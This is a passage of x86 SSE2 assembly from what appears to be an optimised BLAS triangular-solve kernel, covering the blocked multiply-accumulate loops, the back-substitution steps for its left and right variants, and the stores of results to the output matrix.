movhpd 12 * SIZE(AA), %xmm0
mulpd %xmm7, %xmm0
subpd %xmm0, %xmm2
movsd 10 * SIZE(AA), %xmm0
movhpd 10 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm5
movsd 9 * SIZE(AA), %xmm0
movhpd 9 * SIZE(AA), %xmm0
mulpd %xmm5, %xmm0
subpd %xmm0, %xmm3
movsd 8 * SIZE(AA), %xmm0
movhpd 8 * SIZE(AA), %xmm0
mulpd %xmm5, %xmm0
subpd %xmm0, %xmm2
movsd 5 * SIZE(AA), %xmm0
movhpd 5 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm3
movsd 4 * SIZE(AA), %xmm0
movhpd 4 * SIZE(AA), %xmm0
mulpd %xmm3, %xmm0
subpd %xmm0, %xmm2
movsd 0 * SIZE(AA), %xmm0
movhpd 0 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm2
#endif
#ifdef LT
movsd 0 * SIZE(AA), %xmm0
movhpd 0 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm2
movsd 1 * SIZE(AA), %xmm0
movhpd 1 * SIZE(AA), %xmm0
mulpd %xmm2, %xmm0
subpd %xmm0, %xmm3
movsd 2 * SIZE(AA), %xmm0
movhpd 2 * SIZE(AA), %xmm0
mulpd %xmm2, %xmm0
subpd %xmm0, %xmm5
movsd 3 * SIZE(AA), %xmm0
movhpd 3 * SIZE(AA), %xmm0
mulpd %xmm2, %xmm0
subpd %xmm0, %xmm7
movsd 5 * SIZE(AA), %xmm0
movhpd 5 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm3
movsd 6 * SIZE(AA), %xmm0
movhpd 6 * SIZE(AA), %xmm0
mulpd %xmm3, %xmm0
subpd %xmm0, %xmm5
movsd 7 * SIZE(AA), %xmm0
movhpd 7 * SIZE(AA), %xmm0
mulpd %xmm3, %xmm0
subpd %xmm0, %xmm7
movsd 10 * SIZE(AA), %xmm0
movhpd 10 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm5
movsd 11 * SIZE(AA), %xmm0
movhpd 11 * SIZE(AA), %xmm0
mulpd %xmm5, %xmm0
subpd %xmm0, %xmm7
movsd 15 * SIZE(AA), %xmm0
movhpd 15 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm7
#endif
#ifdef RN
movsd 0 * SIZE(B), %xmm4
movhpd 0 * SIZE(B), %xmm4
mulpd %xmm4, %xmm0
mulpd %xmm4, %xmm1
movsd 1 * SIZE(B), %xmm4
movhpd 1 * SIZE(B), %xmm4
mulpd %xmm0, %xmm4
subpd %xmm4, %xmm2
movsd 1 * SIZE(B), %xmm4
movhpd 1 * SIZE(B), %xmm4
mulpd %xmm1, %xmm4
subpd %xmm4, %xmm3
movsd 3 * SIZE(B), %xmm4
movhpd 3 * SIZE(B), %xmm4
mulpd %xmm4, %xmm2
mulpd %xmm4, %xmm3
#endif
#ifdef RT
movsd 3 * SIZE(B), %xmm4
movhpd 3 * SIZE(B), %xmm4
mulpd %xmm4, %xmm2
mulpd %xmm4, %xmm3
movsd 2 * SIZE(B), %xmm4
movhpd 2 * SIZE(B), %xmm4
mulpd %xmm2, %xmm4
subpd %xmm4, %xmm0
movsd 2 * SIZE(B), %xmm4
movhpd 2 * SIZE(B), %xmm4
mulpd %xmm3, %xmm4
subpd %xmm4, %xmm1
movsd 0 * SIZE(B), %xmm4
movhpd 0 * SIZE(B), %xmm4
mulpd %xmm4, %xmm0
mulpd %xmm4, %xmm1
#endif
#if defined(LN) || defined(LT)
movapd %xmm2, 0 * SIZE(B)
movapd %xmm3, 2 * SIZE(B)
movapd %xmm5, 4 * SIZE(B)
movapd %xmm7, 6 * SIZE(B)
movsd %xmm2, 0 * SIZE(BB)
movsd %xmm2, 1 * SIZE(BB)
movhpd %xmm2, 2 * SIZE(BB)
movhpd %xmm2, 3 * SIZE(BB)
movsd %xmm3, 4 * SIZE(BB)
movsd %xmm3, 5 * SIZE(BB)
movhpd %xmm3, 6 * SIZE(BB)
movhpd %xmm3, 7 * SIZE(BB)
movsd %xmm5, 8 * SIZE(BB)
movsd %xmm5, 9 * SIZE(BB)
movhpd %xmm5, 10 * SIZE(BB)
movhpd %xmm5, 11 * SIZE(BB)
movsd %xmm7, 12 * SIZE(BB)
movsd %xmm7, 13 * SIZE(BB)
movhpd %xmm7, 14 * SIZE(BB)
movhpd %xmm7, 15 * SIZE(BB)
#else
movapd %xmm0, 0 * SIZE(AA)
movapd %xmm1, 2 * SIZE(AA)
movapd %xmm2, 4 * SIZE(AA)
movapd %xmm3, 6 * SIZE(AA)
#endif
#ifdef LN
subl $4 * SIZE, %esi
#endif
#if defined(LN) || defined(LT)
movsd %xmm2, 0 * SIZE(%esi)
movsd %xmm3, 1 * SIZE(%esi)
movsd %xmm5, 2 * SIZE(%esi)
movsd %xmm7, 3 * SIZE(%esi)
movhpd %xmm2, 0 * SIZE(%esi, LDC)
movhpd %xmm3, 1 * SIZE(%esi, LDC)
movhpd %xmm5, 2 * SIZE(%esi, LDC)
movhpd %xmm7, 3 * SIZE(%esi, LDC)
#else
movsd %xmm0, 0 * SIZE(%esi)
movhpd %xmm0, 1 * SIZE(%esi)
movsd %xmm1, 2 * SIZE(%esi)
movhpd %xmm1, 3 * SIZE(%esi)
movsd %xmm2, 0 * SIZE(%esi, LDC)
movhpd %xmm2, 1 * SIZE(%esi, LDC)
movsd %xmm3, 2 * SIZE(%esi, LDC)
movhpd %xmm3, 3 * SIZE(%esi, LDC)
#endif
#ifndef LN
addl $4 * SIZE, %esi
#endif
#if defined(LT) || defined(RN)
movl K, %eax
subl KK, %eax
leal (,%eax, SIZE), %eax
leal (AA, %eax, 4), AA
#ifdef LT
addl $8 * SIZE, B
#endif
#endif
#ifdef LN
subl $4, KK
movl BORIG, B
#endif
#ifdef LT
addl $4, KK
#endif
#ifdef RT
movl K, %eax
movl BORIG, B
sall $2 + BASE_SHIFT, %eax
addl %eax, AORIG
#endif
decl %ebx # i --
jg .L10
ALIGN_2
.L30:
movl M, %ebx
testl $2, %ebx
jle .L50
#ifdef LN
movl K, %eax
sall $1 + BASE_SHIFT, %eax
subl %eax, AORIG
#endif
#if defined(LN) || defined(RT)
movl KK, %eax
movl AORIG, AA
leal (, %eax, SIZE), %eax
leal (AA, %eax, 2), AA
#endif
leal BUFFER, BB
#if defined(LN) || defined(RT)
movl KK, %eax
sall $1 + BASE_SHIFT, %eax
leal (BB, %eax, 2), BB
#endif
movapd 0 * SIZE(BB), %xmm2
pxor %xmm4, %xmm4
movapd 0 * SIZE(AA), %xmm0
pxor %xmm5, %xmm5
movapd 8 * SIZE(BB), %xmm3
pxor %xmm6, %xmm6
movapd 8 * SIZE(AA), %xmm1
pxor %xmm7, %xmm7
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
sarl $3, %eax
je .L32
.L31:
mulpd %xmm0, %xmm2
mulpd 2 * SIZE(BB), %xmm0
addpd %xmm2, %xmm4
movapd 4 * SIZE(BB), %xmm2
addpd %xmm0, %xmm5
movapd 2 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm2
mulpd 6 * SIZE(BB), %xmm0
addpd %xmm2, %xmm6
movapd 16 * SIZE(BB), %xmm2
addpd %xmm0, %xmm7
movapd 4 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm3
mulpd 10 * SIZE(BB), %xmm0
addpd %xmm3, %xmm4
movapd 12 * SIZE(BB), %xmm3
addpd %xmm0, %xmm5
movapd 6 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm3
mulpd 14 * SIZE(BB), %xmm0
addpd %xmm3, %xmm6
movapd 24 * SIZE(BB), %xmm3
addpd %xmm0, %xmm7
movapd 16 * SIZE(AA), %xmm0
mulpd %xmm1, %xmm2
mulpd 18 * SIZE(BB), %xmm1
addpd %xmm2, %xmm4
movapd 20 * SIZE(BB), %xmm2
addpd %xmm1, %xmm5
movapd 10 * SIZE(AA), %xmm1
mulpd %xmm1, %xmm2
mulpd 22 * SIZE(BB), %xmm1
addpd %xmm2, %xmm6
movapd 32 * SIZE(BB), %xmm2
addpd %xmm1, %xmm7
movapd 12 * SIZE(AA), %xmm1
mulpd %xmm1, %xmm3
mulpd 26 * SIZE(BB), %xmm1
addpd %xmm3, %xmm4
movapd 28 * SIZE(BB), %xmm3
addpd %xmm1, %xmm5
movapd 14 * SIZE(AA), %xmm1
mulpd %xmm1, %xmm3
mulpd 30 * SIZE(BB), %xmm1
addpd %xmm3, %xmm6
movapd 40 * SIZE(BB), %xmm3
addpd %xmm1, %xmm7
movapd 24 * SIZE(AA), %xmm1
addl $16 * SIZE, AA
addl $32 * SIZE, BB
BRANCH
decl %eax
jne .L31
.L32:
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
andl $7, %eax # if (k & 1)
BRANCH
je .L34
.L33:
mulpd %xmm0, %xmm2
mulpd 2 * SIZE(BB), %xmm0
addpd %xmm2, %xmm4
movapd 4 * SIZE(BB), %xmm2
addpd %xmm0, %xmm5
movapd 2 * SIZE(AA), %xmm0
addl $2 * SIZE, AA # aoffset += 8
addl $4 * SIZE, BB # boffset1 += 8
decl %eax
BRANCH
jg .L33
ALIGN_4
.L34:
addpd %xmm6, %xmm4
addpd %xmm7, %xmm5
#if defined(LN) || defined(RT)
movl KK, %eax
#ifdef LN
subl $2, %eax
#else
subl $2, %eax
#endif
movl AORIG, AA
movl BORIG, B
leal BUFFER, BB
leal (, %eax, SIZE), %eax
leal (AA, %eax, 2), AA
leal (B, %eax, 2), B
leal (BB, %eax, 4), BB
#endif
#if defined(LN) || defined(LT)
movapd %xmm4, %xmm0
unpcklpd %xmm5, %xmm4
unpckhpd %xmm5, %xmm0
movapd 0 * SIZE(B), %xmm2
movapd 2 * SIZE(B), %xmm3
subpd %xmm4, %xmm2
subpd %xmm0, %xmm3
#else
movapd 0 * SIZE(AA), %xmm0
movapd 2 * SIZE(AA), %xmm1
subpd %xmm4, %xmm0
subpd %xmm5, %xmm1
#endif
#ifdef LN
movsd 3 * SIZE(AA), %xmm0
movhpd 3 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm3
movsd 2 * SIZE(AA), %xmm0
movhpd 2 * SIZE(AA), %xmm0
mulpd %xmm3, %xmm0
subpd %xmm0, %xmm2
movsd 0 * SIZE(AA), %xmm0
movhpd 0 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm2
#endif
#ifdef LT
movsd 0 * SIZE(AA), %xmm0
movhpd 0 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm2
movsd 1 * SIZE(AA), %xmm0
movhpd 1 * SIZE(AA), %xmm0
mulpd %xmm2, %xmm0
subpd %xmm0, %xmm3
movsd 3 * SIZE(AA), %xmm0
movhpd 3 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm3
#endif
#ifdef RN
movsd 0 * SIZE(B), %xmm4
movhpd 0 * SIZE(B), %xmm4
mulpd %xmm4, %xmm0
movsd 1 * SIZE(B), %xmm4
movhpd 1 * SIZE(B), %xmm4
mulpd %xmm0, %xmm4
subpd %xmm4, %xmm1
movsd 3 * SIZE(B), %xmm4
movhpd 3 * SIZE(B), %xmm4
mulpd %xmm4, %xmm1
#endif
#ifdef RT
movsd 3 * SIZE(B), %xmm4
movhpd 3 * SIZE(B), %xmm4
mulpd %xmm4, %xmm1
movsd 2 * SIZE(B), %xmm4
movhpd 2 * SIZE(B), %xmm4
mulpd %xmm1, %xmm4
subpd %xmm4, %xmm0
movsd 0 * SIZE(B), %xmm4
movhpd 0 * SIZE(B), %xmm4
mulpd %xmm4, %xmm0
#endif
#if defined(LN) || defined(LT)
movapd %xmm2, 0 * SIZE(B)
movapd %xmm3, 2 * SIZE(B)
movsd %xmm2, 0 * SIZE(BB)
movsd %xmm2, 1 * SIZE(BB)
movhpd %xmm2, 2 * SIZE(BB)
movhpd %xmm2, 3 * SIZE(BB)
movsd %xmm3, 4 * SIZE(BB)
movsd %xmm3, 5 * SIZE(BB)
movhpd %xmm3, 6 * SIZE(BB)
movhpd %xmm3, 7 * SIZE(BB)
#else
movapd %xmm0, 0 * SIZE(AA)
movapd %xmm1, 2 * SIZE(AA)
#endif
#ifdef LN
subl $2 * SIZE, %esi
#endif
#if defined(LN) || defined(LT)
movsd %xmm2, 0 * SIZE(%esi)
movsd %xmm3, 1 * SIZE(%esi)
movhpd %xmm2, 0 * SIZE(%esi, LDC)
movhpd %xmm3, 1 * SIZE(%esi, LDC)
#else
movsd %xmm0, 0 * SIZE(%esi)
movhpd %xmm0, 1 * SIZE(%esi)
movsd %xmm1, 0 * SIZE(%esi, LDC)
movhpd %xmm1, 1 * SIZE(%esi, LDC)
#endif
#ifndef LN
addl $2 * SIZE, %esi
#endif
#if defined(LT) || defined(RN)
movl K, %eax
subl KK, %eax
leal (,%eax, SIZE), %eax
leal (AA, %eax, 2), AA
#ifdef LT
addl $4 * SIZE, B
#endif
#endif
#ifdef LN
subl $2, KK
movl BORIG, B
#endif
#ifdef LT
addl $2, KK
#endif
#ifdef RT
movl K, %eax
movl BORIG, B
sall $1 + BASE_SHIFT, %eax
addl %eax, AORIG
#endif
ALIGN_2
.L50:
movl M, %ebx
testl $1, %ebx
jle .L99
#ifdef LN
movl K, %eax
sall $0 + BASE_SHIFT, %eax
subl %eax, AORIG
#endif
#if defined(LN) || defined(RT)
movl KK, %eax
movl AORIG, AA
leal (, %eax, SIZE), %eax
leal (AA, %eax, 1), AA
#endif
leal BUFFER, %ecx
#if defined(LN) || defined(RT)
movl KK, %eax
sall $1 + BASE_SHIFT, %eax
leal (BB, %eax, 2), BB
#endif
movsd 0 * SIZE(BB), %xmm2
pxor %xmm4, %xmm4
movsd 0 * SIZE(AA), %xmm0
pxor %xmm5, %xmm5
movsd 8 * SIZE(BB), %xmm3
pxor %xmm6, %xmm6
movsd 4 * SIZE(AA), %xmm1
pxor %xmm7, %xmm7
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
sarl $3, %eax
je .L52
.L51:
mulsd %xmm0, %xmm2
mulsd 2 * SIZE(BB), %xmm0
addsd %xmm2, %xmm4
movsd 4 * SIZE(BB), %xmm2
addsd %xmm0, %xmm5
movsd 1 * SIZE(AA), %xmm0
mulsd %xmm0, %xmm2
mulsd 6 * SIZE(BB), %xmm0
addsd %xmm2, %xmm4
movsd 16 * SIZE(BB), %xmm2
addsd %xmm0, %xmm5
movsd 2 * SIZE(AA), %xmm0
mulsd %xmm0, %xmm3
mulsd 10 * SIZE(BB), %xmm0
addsd %xmm3, %xmm4
movsd 12 * SIZE(BB), %xmm3
addsd %xmm0, %xmm5
movsd 3 * SIZE(AA), %xmm0
mulsd %xmm0, %xmm3
mulsd 14 * SIZE(BB), %xmm0
addsd %xmm3, %xmm4
movsd 24 * SIZE(BB), %xmm3
addsd %xmm0, %xmm5
movsd 8 * SIZE(AA), %xmm0
mulsd %xmm1, %xmm2
mulsd 18 * SIZE(BB), %xmm1
addsd %xmm2, %xmm4
movsd 20 * SIZE(BB), %xmm2
addsd %xmm1, %xmm5
movsd 5 * SIZE(AA), %xmm1
mulsd %xmm1, %xmm2
mulsd 22 * SIZE(BB), %xmm1
addsd %xmm2, %xmm4
movsd 32 * SIZE(BB), %xmm2
addsd %xmm1, %xmm5
movsd 6 * SIZE(AA), %xmm1
mulsd %xmm1, %xmm3
mulsd 26 * SIZE(BB), %xmm1
addsd %xmm3, %xmm4
movsd 28 * SIZE(BB), %xmm3
addsd %xmm1, %xmm5
movsd 7 * SIZE(AA), %xmm1
mulsd %xmm1, %xmm3
mulsd 30 * SIZE(BB), %xmm1
addsd %xmm3, %xmm4
movsd 40 * SIZE(BB), %xmm3
addsd %xmm1, %xmm5
movsd 12 * SIZE(AA), %xmm1
addl $ 8 * SIZE, AA
addl $32 * SIZE, BB
BRANCH
decl %eax
jne .L51
.L52:
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
andl $7, %eax # if (k & 1)
BRANCH
je .L54
.L53:
mulsd %xmm0, %xmm2
mulsd 2 * SIZE(BB), %xmm0
addsd %xmm2, %xmm4
movsd 4 * SIZE(BB), %xmm2
addsd %xmm0, %xmm5
movsd 1 * SIZE(AA), %xmm0
addl $1 * SIZE, AA # aoffset += 8
addl $4 * SIZE, BB # boffset1 += 8
decl %eax
BRANCH
jg .L53
ALIGN_4
.L54:
addsd %xmm6, %xmm4
addsd %xmm7, %xmm5
#if defined(LN) || defined(RT)
movl KK, %eax
#ifdef LN
subl $1, %eax
#else
subl $2, %eax
#endif
movl AORIG, AA
movl BORIG, B
leal BUFFER, BB
leal (, %eax, SIZE), %eax
leal (AA, %eax, 1), AA
leal (B, %eax, 2), B
leal (BB, %eax, 4), BB
#endif
#if defined(LN) || defined(LT)
movsd 0 * SIZE(B), %xmm0
movsd 1 * SIZE(B), %xmm1
#else
movsd 0 * SIZE(AA), %xmm0
movsd 1 * SIZE(AA), %xmm1
#endif
subsd %xmm4, %xmm0
subsd %xmm5, %xmm1
#if defined(LN) || defined(LT)
movsd 0 * SIZE(AA), %xmm2
mulsd %xmm2, %xmm0
mulsd %xmm2, %xmm1
#endif
#ifdef RN
mulsd 0 * SIZE(B), %xmm0
movsd 1 * SIZE(B), %xmm4
mulsd %xmm0, %xmm4
subsd %xmm4, %xmm1
mulsd 3 * SIZE(B), %xmm1
#endif
#ifdef RT
mulsd 3 * SIZE(B), %xmm1
movsd 2 * SIZE(B), %xmm4
mulsd %xmm1, %xmm4
subsd %xmm4, %xmm0
mulsd 0 * SIZE(B), %xmm0
#endif
#if defined(LN) || defined(LT)
movsd %xmm0, 0 * SIZE(B)
movsd %xmm1, 1 * SIZE(B)
movsd %xmm0, 0 * SIZE(BB)
movsd %xmm0, 1 * SIZE(BB)
movsd %xmm1, 2 * SIZE(BB)
movsd %xmm1, 3 * SIZE(BB)
#else
movsd %xmm0, 0 * SIZE(AA)
movsd %xmm1, 1 * SIZE(AA)
#endif
#ifdef LN
subl $1 * SIZE, %esi
#endif
movsd %xmm0, 0 * SIZE(%esi)
movsd %xmm1, 0 * SIZE(%esi, LDC)
#ifndef LN
addl $1 * SIZE, %esi
#endif
#if defined(LT) || defined(RN)
movl K, %eax
subl KK, %eax
leal (,%eax, SIZE), %eax
leal (AA, %eax, 1), AA
#ifdef LT
addl $2 * SIZE, B
#endif
#endif
#ifdef LN
subl $1, KK
movl BORIG, B
#endif
#ifdef LT
addl $1, KK
#endif
#ifdef RT
movl K, %eax
movl BORIG, B
sall $0 + BASE_SHIFT, %eax
addl %eax, AORIG
#endif
ALIGN_2
.L99:
#ifdef LN
movl K, %eax
leal (, %eax, SIZE), %eax
leal (B, %eax, 2), B
#endif
#if defined(LT) || defined(RN)
movl K, %eax
subl KK, %eax
leal (,%eax, SIZE), %eax
leal (B, %eax, 2), B
#endif
#ifdef RN
addl $2, KK
#endif
#ifdef RT
subl $2, KK
#endif
decl J # j --
jg .L01
ALIGN_2
.L100:
movl N, %eax
testl $1, %eax
jle .L999
ALIGN_2
.L101:
/* Copying to Sub Buffer */
#ifdef LN
movl OFFSET, %eax
addl M, %eax
movl %eax, KK
#endif
leal BUFFER, %ecx
#ifdef RT
movl K, %eax
sall $0 + BASE_SHIFT, %eax
subl %eax, B
#endif
#if defined(LN) || defined(RT)
movl KK, %eax
movl B, BORIG
leal (, %eax, SIZE), %eax
leal (B, %eax, 1), B
leal (BB, %eax, 2), BB
#endif
#ifdef LT
movl OFFSET, %eax
movl %eax, KK
#endif
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
sarl $3, %eax
jle .L103
ALIGN_4
.L102:
movsd 0 * SIZE(B), %xmm0
movsd 1 * SIZE(B), %xmm1
movsd 2 * SIZE(B), %xmm2
movsd 3 * SIZE(B), %xmm3
movsd 4 * SIZE(B), %xmm4
movsd 5 * SIZE(B), %xmm5
movsd 6 * SIZE(B), %xmm6
movsd 7 * SIZE(B), %xmm7
unpcklpd %xmm0, %xmm0
unpcklpd %xmm1, %xmm1
unpcklpd %xmm2, %xmm2
unpcklpd %xmm3, %xmm3
unpcklpd %xmm4, %xmm4
unpcklpd %xmm5, %xmm5
unpcklpd %xmm6, %xmm6
unpcklpd %xmm7, %xmm7
movapd %xmm0, 0 * SIZE(%ecx)
movapd %xmm1, 2 * SIZE(%ecx)
movapd %xmm2, 4 * SIZE(%ecx)
movapd %xmm3, 6 * SIZE(%ecx)
movapd %xmm4, 8 * SIZE(%ecx)
movapd %xmm5, 10 * SIZE(%ecx)
movapd %xmm6, 12 * SIZE(%ecx)
movapd %xmm7, 14 * SIZE(%ecx)
prefetcht0 104 * SIZE(B)
addl $ 8 * SIZE, B
addl $16 * SIZE, %ecx
decl %eax
BRANCH
jne .L102
ALIGN_2
.L103:
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
andl $7, %eax
BRANCH
jle .L105
ALIGN_2
.L104:
movsd 0 * SIZE(B), %xmm0
unpcklpd %xmm0, %xmm0
movapd %xmm0, 0 * SIZE(%ecx)
addl $1 * SIZE, B
addl $2 * SIZE, %ecx
decl %eax
jne .L104
ALIGN_4
.L105:
#if defined(LT) || defined(RN)
movl A, AA
#else
movl A, %eax
movl %eax, AORIG
#endif
#ifdef RT
subl LDC, C
#endif
movl C, %esi # coffset = c
#ifndef RT
addl LDC, C
#endif
movl M, %ebx
sarl $2, %ebx # i = (m >> 2)
jle .L130
ALIGN_4
.L110:
#ifdef LN
movl K, %eax
sall $2 + BASE_SHIFT, %eax
subl %eax, AORIG
#endif
#if defined(LN) || defined(RT)
movl KK, %eax
movl AORIG, AA
leal (, %eax, SIZE), %eax
leal (AA, %eax, 4), AA
#endif
leal BUFFER, BB
#if defined(LN) || defined(RT)
movl KK, %eax
sall $0 + BASE_SHIFT, %eax
leal (BB, %eax, 2), BB
#endif
movapd 0 * SIZE(BB), %xmm2
pxor %xmm4, %xmm4
movapd 0 * SIZE(AA), %xmm0
pxor %xmm5, %xmm5
movapd 8 * SIZE(BB), %xmm3
pxor %xmm6, %xmm6
movapd 8 * SIZE(AA), %xmm1
pxor %xmm7, %xmm7
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
sarl $3, %eax
je .L112
.L111:
mulpd %xmm2, %xmm0
mulpd 2 * SIZE(AA), %xmm2
addpd %xmm0, %xmm4
movapd 4 * SIZE(AA), %xmm0
addpd %xmm2, %xmm6
movapd 2 * SIZE(BB), %xmm2
mulpd %xmm2, %xmm0
mulpd 6 * SIZE(AA), %xmm2
addpd %xmm0, %xmm5
movapd 16 * SIZE(AA), %xmm0
addpd %xmm2, %xmm7
movapd 4 * SIZE(BB), %xmm2
mulpd %xmm2, %xmm1
mulpd 10 * SIZE(AA), %xmm2
addpd %xmm1, %xmm4
movapd 12 * SIZE(AA), %xmm1
addpd %xmm2, %xmm6
movapd 6 * SIZE(BB), %xmm2
mulpd %xmm2, %xmm1
mulpd 14 * SIZE(AA), %xmm2
addpd %xmm1, %xmm5
movapd 24 * SIZE(AA), %xmm1
addpd %xmm2, %xmm7
movapd 16 * SIZE(BB), %xmm2
mulpd %xmm3, %xmm0
mulpd 18 * SIZE(AA), %xmm3
addpd %xmm0, %xmm4
movapd 20 * SIZE(AA), %xmm0
addpd %xmm3, %xmm6
movapd 10 * SIZE(BB), %xmm3
mulpd %xmm3, %xmm0
mulpd 22 * SIZE(AA), %xmm3
addpd %xmm0, %xmm5
movapd 32 * SIZE(AA), %xmm0
addpd %xmm3, %xmm7
movapd 12 * SIZE(BB), %xmm3
mulpd %xmm3, %xmm1
mulpd 26 * SIZE(AA), %xmm3
addpd %xmm1, %xmm4
movapd 28 * SIZE(AA), %xmm1
addpd %xmm3, %xmm6
movapd 14 * SIZE(BB), %xmm3
mulpd %xmm3, %xmm1
mulpd 30 * SIZE(AA), %xmm3
addpd %xmm1, %xmm5
movapd 40 * SIZE(AA), %xmm1
addpd %xmm3, %xmm7
movapd 24 * SIZE(BB), %xmm3
addl $32 * SIZE, AA
addl $16 * SIZE, BB
decl %eax
jne .L111
.L112:
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
andl $7, %eax # if (k & 1)
BRANCH
je .L114
.L113:
mulpd %xmm2, %xmm0
mulpd 2 * SIZE(AA), %xmm2
addpd %xmm0, %xmm4
movapd 4 * SIZE(AA), %xmm0
addpd %xmm2, %xmm6
movapd 2 * SIZE(BB), %xmm2
addl $4 * SIZE, AA # aoffset += 8
addl $2 * SIZE, BB # boffset1 += 8
subl $1, %eax
jg .L113
ALIGN_4
.L114:
addpd %xmm5, %xmm4
addpd %xmm7, %xmm6
#if defined(LN) || defined(RT)
movl KK, %eax
#ifdef LN
subl $4, %eax
#else
subl $1, %eax
#endif
movl AORIG, AA
movl BORIG, B
leal BUFFER, BB
leal (, %eax, SIZE), %eax
leal (AA, %eax, 4), AA
leal (B, %eax, 1), B
leal (BB, %eax, 2), BB
#endif
#if defined(LN) || defined(LT)
movapd 0 * SIZE(B), %xmm0
movapd 2 * SIZE(B), %xmm1
#else
movapd 0 * SIZE(AA), %xmm0
movapd 2 * SIZE(AA), %xmm1
#endif
subpd %xmm4, %xmm0
subpd %xmm6, %xmm1
#ifdef LN
movapd %xmm0, %xmm2
unpckhpd %xmm2, %xmm2
movapd %xmm1, %xmm3
unpckhpd %xmm3, %xmm3
movsd 15 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm3
movsd 14 * SIZE(AA), %xmm5
mulsd %xmm3, %xmm5
subsd %xmm5, %xmm1
movsd 13 * SIZE(AA), %xmm6
mulsd %xmm3, %xmm6
subsd %xmm6, %xmm2
movsd 12 * SIZE(AA), %xmm7
mulsd %xmm3, %xmm7
subsd %xmm7, %xmm0
movsd 10 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm1
movsd 9 * SIZE(AA), %xmm5
mulsd %xmm1, %xmm5
subsd %xmm5, %xmm2
movsd 8 * SIZE(AA), %xmm6
mulsd %xmm1, %xmm6
subsd %xmm6, %xmm0
movsd 5 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm2
movsd 4 * SIZE(AA), %xmm5
mulsd %xmm2, %xmm5
subsd %xmm5, %xmm0
movsd 0 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm0
unpcklpd %xmm2, %xmm0
unpcklpd %xmm3, %xmm1
#endif
#ifdef LT
movapd %xmm0, %xmm2
unpckhpd %xmm2, %xmm2
movapd %xmm1, %xmm3
unpckhpd %xmm3, %xmm3
movsd 0 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm0
movsd 1 * SIZE(AA), %xmm5
mulsd %xmm0, %xmm5
subsd %xmm5, %xmm2
movsd 2 * SIZE(AA), %xmm6
mulsd %xmm0, %xmm6
subsd %xmm6, %xmm1
movsd 3 * SIZE(AA), %xmm7
mulsd %xmm0, %xmm7
subsd %xmm7, %xmm3
movsd 5 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm2
movsd 6 * SIZE(AA), %xmm5
mulsd %xmm2, %xmm5
subsd %xmm5, %xmm1
movsd 7 * SIZE(AA), %xmm6
mulsd %xmm2, %xmm6
subsd %xmm6, %xmm3
movsd 10 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm1
movsd 11 * SIZE(AA), %xmm5
mulsd %xmm1, %xmm5
subsd %xmm5, %xmm3
movsd 15 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm3
unpcklpd %xmm2, %xmm0
unpcklpd %xmm3, %xmm1
#endif
#if defined(RN) || defined(RT)
movsd 0 * SIZE(B), %xmm4
movhpd 0 * SIZE(B), %xmm4
mulpd %xmm4, %xmm0
mulpd %xmm4, %xmm1
#endif
#if defined(LN) || defined(LT)
movapd %xmm0, 0 * SIZE(B)
movapd %xmm1, 2 * SIZE(B)
movsd %xmm0, 0 * SIZE(BB)
movsd %xmm0, 1 * SIZE(BB)
movhpd %xmm0, 2 * SIZE(BB)
movhpd %xmm0, 3 * SIZE(BB)
movsd %xmm1, 4 * SIZE(BB)
movsd %xmm1, 5 * SIZE(BB)
movhpd %xmm1, 6 * SIZE(BB)
movhpd %xmm1, 7 * SIZE(BB)
#else
movapd %xmm0, 0 * SIZE(AA)
movapd %xmm1, 2 * SIZE(AA)
#endif
#ifdef LN
subl $4 * SIZE, %esi
#endif
movsd %xmm0, 0 * SIZE(%esi)
movhpd %xmm0, 1 * SIZE(%esi)
movsd %xmm1, 2 * SIZE(%esi)
movhpd %xmm1, 3 * SIZE(%esi)
#ifndef LN
addl $4 * SIZE, %esi
#endif
#if defined(LT) || defined(RN)
movl K, %eax
subl KK, %eax
leal (,%eax, SIZE), %eax
leal (AA, %eax, 4), AA
#ifdef LT
addl $4 * SIZE, B
#endif
#endif
#ifdef LN
subl $4, KK
movl BORIG, B
#endif
#ifdef LT
addl $4, KK
#endif
#ifdef RT
movl K, %eax
movl BORIG, B
sall $2 + BASE_SHIFT, %eax
addl %eax, AORIG
#endif
BRANCH
decl %ebx # i --
jg .L110
ALIGN_2
.L130:
movl M, %ebx
testl $2, %ebx
jle .L150
#ifdef LN
movl K, %eax
sall $1 + BASE_SHIFT, %eax
subl %eax, AORIG
#endif
#if defined(LN) || defined(RT)
movl KK, %eax
movl AORIG, AA
leal (, %eax, SIZE), %eax
leal (AA, %eax, 2), AA
#endif
leal BUFFER, BB
movapd 0 * SIZE(BB), %xmm2
pxor %xmm4, %xmm4
movapd 0 * SIZE(AA), %xmm0
pxor %xmm5, %xmm5
movapd 8 * SIZE(BB), %xmm3
pxor %xmm6, %xmm6
